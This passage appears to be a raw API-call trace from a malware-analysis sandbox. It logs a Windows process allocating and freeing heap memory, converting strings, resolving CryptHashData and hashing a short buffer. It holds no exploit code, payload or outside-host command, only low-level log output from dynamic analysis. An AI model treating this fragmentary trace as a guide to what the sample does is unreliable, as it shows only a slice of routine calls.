lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0221.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0221.352] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0221.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0221.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0221.354] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0221.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55028 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0221.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0221.356] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0221.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0221.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0221.357] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0221.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0221.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0221.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.359] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0221.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0221.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.359] CryptHashData (hHash=0xa876d0, pbData=0x2e550b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0221.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0221.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0221.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0221.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0221.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0221.361] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0221.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.362] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0221.362] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0221.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 